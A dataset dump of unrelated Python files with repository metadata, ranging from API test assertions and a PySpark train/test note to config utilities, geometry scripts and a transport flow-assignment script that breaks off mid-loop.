resInfo_12_21 = res_resultDict_2019_12['result']['list'][20]
resInfo_12_22 = res_resultDict_2019_12['result']['list'][21]
resInfo_12_23 = res_resultDict_2019_12['result']['list'][22]
resInfo_12_24 = res_resultDict_2019_12['result']['list'][23]
resInfo_12_25 = res_resultDict_2019_12['result']['list'][24]
resInfo_12_26 = res_resultDict_2019_12['result']['list'][25]
resInfo_12_27 = res_resultDict_2019_12['result']['list'][26]
assert ass.assert_in_text(resInfo_12_01, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_03, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_05, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_06, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_07, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_08, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_09, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_10, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_11, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_12, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_13, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_15, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_16, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_17, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_18, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_19, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_20, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_21, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_22, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_23, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_24, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_25, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_26, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_27, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
if __name__ == '__main__':
a = Attendance_analyse_late_02()
a.test_late_02()
| [
"[email protected]"
] | |
3278d42f28e4adebbe01bf582c688739941488df | 8e95e79840005f6c34dfb978e8fe6e0ec4f7f643 | /9_Introduction to PySpark_/33_Test vs Train.py | 658938186f8e89f8ce821abc3d047cec0a15515f | [] | no_license | Naysla/Machine_Learning | a0593cac41ef1561f14bec55780570b82fc37720 | e75d5cd2894ccb005228ab3da87dde9025385a08 | refs/heads/master | 2023-02-01T17:19:32.413609 | 2020-12-22T20:36:45 | 2020-12-22T20:36:45 | 323,708,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,086 | py | #Test vs Train
#After you've cleaned your data and gotten it ready for modeling, one of the most important steps is to split the data into a test set and a train set. After that, don't touch your test data until you think you have a good model! As you're building models and forming hypotheses, you can test them on your training data to get an idea of their performance.
#
#Once you've got your favorite model, you can see how well it predicts the new data in your test set. This never-before-seen data will give you a much more realistic idea of your model's performance in the real world when you're trying to predict or classify new data.
#
#In Spark it's important to make sure you split the data after all the transformations. This is because operations like StringIndexer don't always produce the same index even when given the same list of strings.
#
#Why is it important to use a test set in model evaluation?
#By evaluating your model with a test set you can get a good idea of performance on new data.
#Exactly! A test set approximates the 'real world error' of your model.
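#A minimal sketch of the split itself (assuming model_data is the prepared
#DataFrame from earlier in the course; the 60/40 ratio and the seed are only
#illustrative):
#training, test = model_data.randomSplit([.6, .4], seed=42)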
| [
"[email protected]"
] | |
92694715d35c931f58ea9fdacff0c277bec3d3a8 | 5ffed81ced523b6e417b4e48d20380b6f16f8f42 | /exam/football_souvenirs.py | 867e2341fa443122f3abe1f9ea0b7f84ec5776db | [] | no_license | Nikoletazl/Basics-Python | 0f3f095bd51f9546c681e3cdd268232de88749ab | 17aef1b95814f13a02053681aae3e617e56f2fe6 | refs/heads/main | 2023-08-14T15:48:48.450249 | 2021-10-08T15:02:35 | 2021-10-08T15:02:35 | 415,027,622 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,959 | py | team = input()
souvenirs = input()
count_souvenirs = int(input())
if souvenirs == "flags":
if team == "Argentina":
price = count_souvenirs * 3.25
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 4.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 2.75
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 3.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "caps":
if team == "Argentina":
price = count_souvenirs * 7.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 8.50
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 6.90
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 6.50
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "posters":
if team == "Argentina":
price = count_souvenirs * 5.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 5.35
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 4.95
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 4.80
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "stickers":
if team == "Argentina":
price = count_souvenirs * 1.25
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 1.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 1.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 0.90
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
else:
print("Invalid stock!")
| [
"[email protected]"
] | |
132631fbc191c0d961db1e6783c48e19d8e8fd46 | 72d7cfbdd02f77300edb0f5e4104a1a147048ade | /djangoproject/myproject/users/migrations/0001_initial.py | e5e66726f68bb3366e771d7f04511d21d385f875 | [] | no_license | simrangrover5/batch430 | 33f3e59b7d2c70f87d796cc869855975ffef976a | ec841051d3a84cd56515aeff3b9d328cebea3705 | refs/heads/master | 2020-12-18T09:21:12.518412 | 2020-02-11T12:40:48 | 2020-02-11T12:40:48 | 235,325,192 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | # Generated by Django 3.0.1 on 2020-01-27 11:30
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Adduser',
fields=[
('username', models.CharField(max_length=100, unique=True)),
('email', models.EmailField(max_length=100, primary_key=True, serialize=False)),
('password', models.CharField(max_length=100)),
('pic', models.ImageField(upload_to='')),
],
),
]
| [
"[email protected]"
] | |
5ef8097cf66e2db0fa6b7d8d2d11a22a0d3f97e1 | ce75bce747bf60b364bc2e516824fc69c64a7eec | /opengever/maintenance/scripts/archive/04_fix_ai_refnums.py | ede9e2ca2e686c1b7c72846ef4c543e7a57ffdfb | [] | no_license | 4teamwork/opengever.maintenance | c94e470af31f891d0969877533e5acd37369f70f | f2b9866fb6cce1d24e29b084b757eec857119479 | refs/heads/master | 2023-07-28T17:57:09.619138 | 2023-07-14T13:08:20 | 2023-07-14T13:08:20 | 14,493,557 | 2 | 0 | null | 2023-08-31T09:07:21 | 2013-11-18T13:46:30 | Python | UTF-8 | Python | false | false | 6,511 | py | from Acquisition import aq_inner
from Acquisition import aq_parent
from opengever.base.adapters import CHILD_REF_KEY
from opengever.base.adapters import DOSSIER_KEY
from opengever.base.adapters import PREFIX_REF_KEY
from opengever.base.adapters import REPOSITORY_FOLDER_KEY
from opengever.base.interfaces import IReferenceNumberFormatter
from opengever.base.interfaces import IReferenceNumberPrefix
from opengever.base.interfaces import IReferenceNumberSettings
from opengever.dossier.behaviors.dossier import IDossierMarker
from opengever.dossier.templatedossier import ITemplateDossier
from opengever.maintenance.debughelpers import setup_app
from opengever.maintenance.debughelpers import setup_plone
from opengever.repository.interfaces import IRepositoryFolder
from opengever.repository.repositoryroot import IRepositoryRoot
from opengever.task.task import ITask
from plone import api
from plone.registry.interfaces import IRegistry
from zope.annotation.interfaces import IAnnotations
from zope.app.intid.interfaces import IIntIds
from zope.component import getUtility
from zope.component import queryAdapter
import transaction
SEPARATOR = '-' * 78
class ReferenceNumberHelper(object):
"""Helper class for dealing with reference numbers.
"""
def __init__(self, log_func, site):
self.log = log_func
self.site = site
def get_repo_dossier_separator(self, obj=None):
registry = getUtility(IRegistry)
proxy = registry.forInterface(IReferenceNumberSettings)
formatter = queryAdapter(obj,
IReferenceNumberFormatter,
name=proxy.formatter)
return formatter.repository_dossier_seperator
def get_new_mapping(self, key, obj):
parent = aq_parent(aq_inner(obj))
ann = IAnnotations(parent)
if IDossierMarker.providedBy(obj):
mapping_base = ann.get(DOSSIER_KEY)
elif IRepositoryFolder.providedBy(obj) or IRepositoryRoot.providedBy(obj):
mapping_base = ann.get(REPOSITORY_FOLDER_KEY)
else:
raise Exception("Unknown object type!")
if not mapping_base:
return None
mapping = mapping_base.get(key)
return mapping
class ReferenceNumberFixer(object):
"""This is the fix for some previously run fixscripts.
It attempts to fix broken reference numbers. A new reference number has
    been generated by mistake while moving content. Some fix-scripts have then
attempted to revert these reference numbers to their previous state. This
    seems to have failed in some cases:
The reference numbers are now in an inconsistent state and have different
values in child_mapping and prefix_mapping. This script reverts the
reference numbers to the state as defined in child_mapping. If multiple
values are defined in child_mapping it takes the higher (later) one.
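    A hypothetical illustration, for an object whose intid is 42: child_mapping
    might read {u'3': 42, u'7': 42} (two historical reference numbers point at
    the object) while prefix_mapping reads {42: u'9'}; the fixer resets
    prefix_mapping[42] to u'7', the highest number recorded in child_mapping,
    and reindexes the affected objects.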
"""
def __init__(self, log_func, site):
self.catalog = api.portal.get_tool('portal_catalog')
self.parent_logger = log_func
self.site = site
self.helper = ReferenceNumberHelper(log_func, site)
self.intids = getUtility(IIntIds)
self.ignored_ids = ['vorlagen']
self.objs_to_reindex = set()
def log(self, msg):
msg = " " + msg
return self.parent_logger(msg)
def _fix_wrong_mappings(self, obj):
"""Detect the following errors:
- entry of reference number in prefix_mapping available
- no entry in child_mapping for that refernece numbers, but for
other (previous) reference numbers for that content object
"""
parent = aq_parent(aq_inner(obj))
local_number = IReferenceNumberPrefix(parent).get_number(obj)
intid = self.intids.getId(obj)
try:
child_mapping = self.helper.get_new_mapping(CHILD_REF_KEY, obj)
prefix_mapping = self.helper.get_new_mapping(PREFIX_REF_KEY, obj)
has_child_mapping = child_mapping.get(local_number) == intid
has_prefix_mapping = prefix_mapping.get(intid) == local_number
is_assigned_a_refnum = intid in set(child_mapping.values())
if not has_child_mapping:
if is_assigned_a_refnum:
self._revert_to_refnum_in_child_mapping(
obj, parent, local_number, intid, child_mapping, prefix_mapping)
else:
self.log("WARNING: obj %s not in child mapping of parent!" % obj)
if not has_prefix_mapping:
self.log("WARNING: obj %s not in prefix mapping of parent!" % obj)
except Exception, e:
self.log("WARNING: '%s' for %s" % (e, obj))
def _revert_to_refnum_in_child_mapping(self, obj, parent, local_number, intid, child_mapping, prefix_mapping):
previous_refnums = []
for key, value in child_mapping.iteritems():
if value == intid:
previous_refnums.append(key)
max_previous_refnum = unicode(max(map(int, previous_refnums)))
assert int(local_number) > int(max_previous_refnum)
# revert refnum to previous entry
prefix_mapping[intid] = max_previous_refnum
self.log("INFO: reverted %s (%s) from %s to %s" % (obj, intid, local_number, max_previous_refnum))
assert IReferenceNumberPrefix(parent).get_number(obj) == max_previous_refnum
for brain in self.catalog(path='/'.join(obj.getPhysicalPath())):
self.objs_to_reindex.add(brain.getObject())
def fix_child_mappings(self):
dossier_brains = self.catalog(object_provides=IDossierMarker.__identifier__)
for brain in dossier_brains:
obj = brain.getObject()
if ITemplateDossier.providedBy(obj):
continue
if obj.id in self.ignored_ids:
continue
self._fix_wrong_mappings(obj)
for obj in self.objs_to_reindex:
obj.reindexObject(idxs=['reference'])
if ITask.providedBy(obj):
obj.get_sql_object().sync_with(obj)
def main():
app = setup_app()
print SEPARATOR
plone = setup_plone(app, [])
# prevents erroneous execution
transaction.doom()
def log(msg):
print msg
fixer = ReferenceNumberFixer(log, plone)
print "Running 'fixing broken mappings'..."
fixer.fix_child_mappings()
print "Done"
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
ad5d1b7bda9bd683170c32f6da305b9a691513ef | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/ec_14270-1828/sdB_ec_14270-1828_lc.py | bdc07f94a156888a89f067ad64026758d3d61ea9 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[217.450125,-18.693147], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_ec_14270-1828/sdB_ec_14270-1828_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
7fc60fb3e6e5e97749994890220137591cb4ec56 | 51f6443116ef09aa91cca0ac91387c1ce9cb445a | /Curso_Python_3_UDEMY/banco_dados/incluir_contato.py | 79c073a92c51debf70d449c7b8897597efd60f36 | [
"MIT"
] | permissive | DanilooSilva/Cursos_de_Python | f449f75bc586f7cb5a7e43000583a83fff942e53 | 8f167a4c6e16f01601e23b6f107578aa1454472d | refs/heads/main | 2023-07-30T02:11:27.002831 | 2021-10-01T21:52:15 | 2021-10-01T21:52:15 | 331,683,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | from mysql.connector.errors import ProgrammingError
from db import nova_conexao
sql = 'INSERT INTO contatos (nome, tel) VALUES (%s, %s)'
args = ('Danilo', '94955-2951')
with nova_conexao() as conexao:
try:
cursor = conexao.cursor()
cursor.execute(sql, args)
conexao.commit()
except ProgrammingError as e:
print(f'Erro: {e.msg}')
else:
print('1 registro incluído, ID:', cursor.lastrowid)
| [
"[email protected]"
] | |
acb65fbacc27a8ad5009c305ffa87265cef993a0 | be6d5ac1b415335cc7a27cf44e3afa041ef299e3 | /1_3.py | 764d33752a0c10e1a5835a028ea67466c05963df | [
"MIT"
] | permissive | JeffreyAsuncion/PCEP_training_2020_12 | 4746a28f399c499e1bc2c3bf848ce0b05ad903bd | 7477fb57a526ca0efdd156811aa72fae6129b062 | refs/heads/main | 2023-02-05T07:52:13.374651 | 2020-12-20T16:50:24 | 2020-12-20T16:50:24 | 319,857,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | print(2**3)
print(2**3.)
print(2.**3)
print(2.**3.)
print(5//2)
print(2**2**3)
print(2*4)
print(2**4)
print(2.*4)
print(2**4.)
print(2/4)
print(2//4)
print(-2/4)
print(-2//4)
print(2%4)
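# For reference (not part of the original exercise): under Python 3 the 16
# print calls in this file produce, in order,
# 8, 8.0, 8.0, 8.0, 2, 256, 8, 16, 8.0, 16.0, 0.5, 0, -0.5, -1, 2, -2.
# In particular ** is right-associative (2**2**3 == 2**8 == 256), / always
# returns a float, // floors toward negative infinity (-2//4 == -1), and the
# result of % takes the sign of the divisor (2 % -4 == -2).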
print(2%-4) | [
"[email protected]"
] | |
4cc163174dd2cd27ea349f42f6823c5afed30126 | fd41984178ffba0846fa7ab1f67c1a0843a5e3ff | /py2与py3的区别和测试/1.作业-文件的封装/dealFile.py | 43f453b28ac890199b9c17686a9fc1aff0e8e72b | [] | no_license | LasterSmithKim/Python-Base | 23f17472ee80f7224e96a4185775c9cd05ac7a98 | 27756126d999ddabf53b6bdc7114903a297464a0 | refs/heads/master | 2020-03-28T08:00:11.156911 | 2018-11-28T09:54:51 | 2018-11-28T09:54:51 | 147,939,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,170 | py | import csv
import sys
import importlib
importlib.reload(sys)
from pdfminer.pdfparser import PDFParser,PDFDocument
from pdfminer.pdfinterp import PDFResourceManager,PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal,LAParams
from pdfminer.pdfinterp import PDFTextExtractionNotAllowed
class DealFile(object):
    # read a CSV file
def readCsv(self,path):
InfoList = []
with open(path, "r") as f:
allFileInfo = csv.reader(f)
print(allFileInfo)
for row in allFileInfo:
InfoList.append(row)
return InfoList
    # write a CSV file
    # data format: [[1,2,3],[4,5,6],[7,8,9]]
def writeCsv(self,path, data):
with open(path, "w") as f:
writer = csv.writer(f)
for rowData in data:
writer.writerow(rowData)
    # read a PDF file
def readPDF(self,path, callback=None,toPath=""):
f = open(path, "rb")
parser = PDFParser(f)
pdfFile = PDFDocument()
parser.set_document(pdfFile)
pdfFile.set_parser(parser)
pdfFile.initialize()
if not pdfFile.is_extractable:
raise PDFTextExtractionNotAllowed
else:
manager = PDFResourceManager()
laparams = LAParams()
device = PDFPageAggregator(manager, laparams=laparams)
interpreter = PDFPageInterpreter(manager, device)
for page in pdfFile.get_pages():
interpreter.process_page(page)
layout = device.get_result()
for x in layout:
if (isinstance(x, LTTextBoxHorizontal)):
                        # process each line of data
if toPath == "":
                            # process each line of text
str = x.get_text()
if callback != None:
callback(str)
else:
print(str)
else:
                            # write the output to a file
print("将PDF文件写入文件:")
| [
"[email protected]"
] | |
39605e2d34194fa84b99d370e31e678f2bba6463 | 67929a76934c8c6bdacd573e2bc5ad6c0254d69c | /pyfusion/pyfusion/conf/utils.py | 73bb7d253a04345383db0865cd7f7937bf7ccef3 | [] | no_license | SyntaxVoid/PyFusionDIIID | bc284b8480a8c4fc7881585c4fdd76ecc61162e4 | 4d19abed536f7b4d0322636828254ed3dd7a9b4c | refs/heads/master | 2020-05-29T08:41:16.970539 | 2017-06-19T21:26:16 | 2017-06-19T21:26:16 | 69,825,057 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,471 | py | """ Useful functions for manipulating config files."""
from ConfigParser import NoSectionError
import pyfusion
class CannotImportFromConfigError(Exception):
"""Failed to import a module, class or method from config setting."""
def import_from_str(string_value):
# TODO: make shortcuts for loading from within pyfusion
split_val = string_value.split('.')
val_module = __import__('.'.join(split_val[:-1]),
globals(), locals(),
[split_val[-1]])
return val_module.__dict__[split_val[-1]]
def import_setting(component, component_name, setting):
"""Attempt to import and return a config setting."""
value_str = pyfusion.config.pf_get(component, component_name, setting)
return import_from_str(value_str)
def kwarg_config_handler(component_type, component_name, **kwargs):
for config_var in pyfusion.config.pf_options(component_type, component_name):
if not config_var in kwargs.keys():
kwargs[config_var] = pyfusion.config.pf_get(component_type,
component_name, config_var)
return kwargs
def get_config_as_dict(component_type, component_name):
config_option_list = pyfusion.config.pf_options(component_type, component_name)
config_map = lambda x: (x, pyfusion.config.pf_get(component_type, component_name, x))
return dict(map(config_map, config_option_list))
def read_config(config_files):
"""Read config files.
Argument is either a single file object, or a list of filenames.
"""
try:
existing_database = pyfusion.config.get('global', 'database')
except NoSectionError:
existing_database = 'None'
try:
files_read = pyfusion.config.readfp(config_files)
except:
files_read = pyfusion.config.read(config_files)
if files_read != None: # readfp returns None
if len(files_read) == 0:
raise LookupError, str('failed to read config files from [%s]' %
(config_files))
config_database = pyfusion.config.get('global', 'database')
if config_database.lower() != existing_database.lower():
pyfusion.orm_manager.shutdown_orm()
if config_database.lower() != 'none':
pyfusion.orm_manager.load_orm()
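# Typical calls (sketch; the file name is illustrative):
#   read_config(['pyfusion.cfg'])          # list of filenames
#   read_config(open('pyfusion.cfg'))      # single file object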
def clear_config():
"""Clear pyfusion.config."""
import pyfusion
pyfusion.config = pyfusion.conf.PyfusionConfigParser()
| [
"[email protected]"
] | |
ee66a6bd15526f6ff00f62a9ee1641bd9236a49f | 66e06eec0d72dd0f1fbbf2985bbbda858591bffc | /2016/007-Mathsjam/CircleInTriangle.py | 5c15fba7fb64885b75eff5dac15c497aec504ad1 | [] | no_license | kobylin/Lab | b35cd5eba8087946d475202e4d36ef7329bb74a5 | 35a33d84e0de6c891c34aa2806052b5f695f527d | refs/heads/master | 2021-08-30T07:12:52.955872 | 2017-12-16T16:14:27 | 2017-12-16T16:14:27 | 114,474,224 | 0 | 0 | null | 2017-12-16T16:21:33 | 2017-12-16T16:21:33 | null | UTF-8 | Python | false | false | 1,004 | py | from sympy import Point,Line,Circle,intersection,Triangle,N
from svg import Svg
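# Construction sketch: CircleD (radius 2, centred at D) is tangent to the
# x-axis; A is where the tangent drawn from C to CircleD meets the x-axis.
# find_circle then takes the tangent to the current circle at K (the point
# where line AD meets it), intersects that tangent with line AC and with the
# x-axis to cut off a smaller triangle at A, and returns its incircle -- the
# next circle in the chain. Everything is appended to an SVG for inspection.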
C = Point(0,8)
D = Point(0,2)
xaxis = Line(Point(0,0),Point(1,0))
CircleD = Circle(D,2)
tangentE = CircleD.tangent_lines(C)[0]
E = intersection(tangentE,CircleD)[0]
A = intersection(tangentE, xaxis)[0]
CircleD = Circle(D,2)
svg = Svg()
svg.append(C,"C")
#svg.append(D)
svg.append(CircleD,"CircleD")
svg.append(tangentE,"tangE")
svg.append(E,"E")
svg.append(A,"A")
def find_circle(circle,A,C,D,i):
AD = Line(A,D)
svg.append(AD,"AD",i)
K = intersection(circle, AD)[0]
svg.append(K,"K",i)
tangentK = Line(A,D).perpendicular_line(K)
svg.append(tangentK,"tangK",i)
P1 = intersection(tangentK, Line(A,C))[0]
svg.append(P1,"P1",i)
P2 = intersection(tangentK, xaxis)[0]
svg.append(P2,"P2",i)
T = Triangle(P1,A,P2)
svg.append(T,"T",i)
return T.incircle
circle = CircleD
for i in range(1):
circle = find_circle(circle,A,C,D,i)
svg.append(circle,"circle",i)
svg.close() | [
"[email protected]"
] | |
2823a48cbeebcac8a5b49aeb6306ea0ebabe21e0 | 01f535557c2275a0c0cd91687d52c644e8176d00 | /src/vtra/analysis/flow_assignment/industry_flows.py | f08d77411f7d216c3c28a8190c7613a014fea9c4 | [] | no_license | mmc00/oia-transport-archive | a8eaf72751a2c11b2cc2dc475e6eed2421d75381 | f89cb686704fe76c1665697b35d14caccf37f3a1 | refs/heads/master | 2022-03-28T17:44:41.915217 | 2020-01-09T16:22:10 | 2020-01-09T16:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,444 | py | """Summarise hazard data
Get OD data and process it
Author: Raghav Pant
Date: April 20, 2018
"""
import configparser
import csv
import glob
import os
import fiona
import fiona.crs
import rasterio
from sqlalchemy import create_engine
import subprocess as sp
import psycopg2
import osgeo.ogr as ogr
import pandas as pd
import copy
import ast
from osgeo import gdal
import geopandas as gpd
from shapely.geometry import Point
from geoalchemy2 import Geometry, WKTElement
import numpy as np
from vtra.utils import load_config
from vtra.dbutils import *
import vtra.transport_network_creation as tnc
def main():
'''
Create the database connection
'''
conf = load_config()
try:
conn = psycopg2.connect(**conf['database'])
except:
print ("I am unable to connect to the database")
curs = conn.cursor()
    engine = create_engine('postgresql://{user}:{password}@{host}:{port}/{database}'.format(
        **conf['database']
    ))
od_data_file = os.path.join(conf['paths']['data'], 'od_data', 'OD_transport_data_2008_v2.xlsx')
'''
Step 2: Create the OD proprotions for the differnet modes
'''
'''
First get the modal shares
'''
modes = ['road','rail','air','water']
mode_cols = ['road','rail','air','inland','coastal']
new_mode_cols = ['o','d','road','rail','air','water']
mode_table = ['airport_nodes','waternodes','railnetworknodes','road2009nodes']
mode_edge_tables = ['airport_edges','wateredges','railnetworkedges','road2009edges']
mode_flow_tables = []
for mo in mode_edge_tables:
fl_table = mo + '_flows'
mode_flow_tables.append(fl_table)
'''
Get the modal shares
'''
od_data_modes = pd.read_excel(od_data_file,sheet_name = 'mode').fillna(0)
# od_data_modes.columns = map(str.lower, od_data_modes.columns)
o_id_col = 'o'
d_id_col = 'd'
od_data_modes['total'] = od_data_modes[mode_cols].sum(axis=1)
for m in mode_cols:
od_data_modes[m] = od_data_modes[m]/od_data_modes['total'].replace(np.inf, 0)
od_data_modes['water'] = od_data_modes['inland'] + od_data_modes['coastal']
od_data_modes = od_data_modes.fillna(0)
# od_data_modes.to_csv('mode_frac.csv',index = False)
od_fracs = od_data_modes[new_mode_cols]
od_data_com = pd.read_excel(od_data_file,sheet_name = 'goods').fillna(0)
ind_cols = ['sugar','wood','steel','constructi','cement','fertilizer','coal','petroluem','manufactur','fishery','meat']
od_fracs = pd.merge(od_fracs,od_data_com,how='left', on=['o','d'])
del od_data_com,od_data_modes
od_fracs = od_fracs.fillna(0)
# od_fracs.to_csv('od_fracs.csv')
for ind in ind_cols:
'''
Step 2 assign the crop to the closest transport mode node
'''
# mode_table = ['road2009nodes','railwaynetworknodes','airport_nodes','waternodes']
# mode_edge_tables = ['road2009edges','railwaynetworkedges','airport_edges','wateredges']
# modes = ['road','rail','air','water']
modes = ['air','water','rail','road']
mode_id = 'node_id'
od_id = 'od_id'
pop_id = 'population'
o_id_col = 'o'
d_id_col = 'd'
'''
Get the network
'''
eid = 'edge_id'
nfid = 'node_f_id'
ntid = 'node_t_id'
spid = 'speed'
gmid = 'geom'
o_id_col = 'o'
d_id_col = 'd'
'''
Get the node edge flows
'''
excel_writer = pd.ExcelWriter('vietnam_flow_stats_' + ind + '.xlsx')
for m in range(len(mode_table)):
od_nodes_regions = []
sql_query = '''select {0}, {1}, 100*{2}/(sum({3}) over (Partition by {4})) from {5}
'''.format(mode_id,od_id,pop_id,pop_id,od_id,mode_table[m])
curs.execute(sql_query)
read_layer = curs.fetchall()
if read_layer:
for row in read_layer:
n = row[0]
r = row[1]
p = float(row[2])
if p > 0:
od_nodes_regions.append((n,r,p))
all_net_dict = {'edge':[],'from_node':[],'to_node':[],'distance':[],'speed':[],'travel_cost':[]}
all_net_dict = tnc.create_network_dictionary(all_net_dict,mode_edge_tables[m],eid,nfid,ntid,spid,'geom',curs,conn)
od_net = tnc.create_igraph_topology(all_net_dict)
'''
Get the OD flows
'''
net_dict = {'Origin_id':[],'Destination_id':[],'Origin_region':[],'Destination_region':[],'Tonnage':[],'edge_path':[],'node_path':[]}
ofile = 'network_od_flows_' + ind + modes[m] + '.csv'
output_file = open(ofile,'w')
wr = csv.writer(output_file, delimiter=',', quoting=csv.QUOTE_MINIMAL)
wr.writerow(net_dict.keys())
ind_mode = modes[m]+ '_' + ind
od_fracs[ind_mode] = od_fracs[modes[m]]*od_fracs[ind]
od_flows = list(zip(od_fracs[o_id_col].values.tolist(),od_fracs[d_id_col].values.tolist(),od_fracs[ind_mode].values.tolist()))
origins = list(set(od_fracs[o_id_col].values.tolist()))
destinations = list(set(od_fracs[d_id_col].values.tolist()))
dflows = []
# print (od_flows)
for o in origins:
for d in destinations:
fval = [fl for (org,des,fl) in od_flows if org == o and des == d]
if len(fval) == 1 and fval[0] > 0:
o_matches = [(item[0],item[2]) for item in od_nodes_regions if item[1] == o]
if len(o_matches) > 0:
for o_vals in o_matches:
o_val = 1.0*fval[0]*(1.0*o_vals[1]/100)
o_node = o_vals[0]
d_matches = [(item[0],item[2]) for item in od_nodes_regions if item[1] == d]
if len(d_matches) > 0:
for d_vals in d_matches:
od_val = 1.0*o_val*(1.0*d_vals[1]/100)
d_node = d_vals[0]
if od_val > 0 and o_node != d_node:
# od_net = tnc.add_igraph_costs(od_net,t_val,0)
orgn_node = od_net.vs['node'].index(o_node)
dest_node = od_net.vs['node'].index(d_node)
# n_pth = od_net.get_shortest_paths(orgn_node,to = dest_node, weights = 'travel_cost', mode = 'OUT', output='vpath')[0]
e_pth = od_net.get_shortest_paths(orgn_node,to = dest_node, weights = 'travel_cost', mode = 'OUT', output='epath')[0]
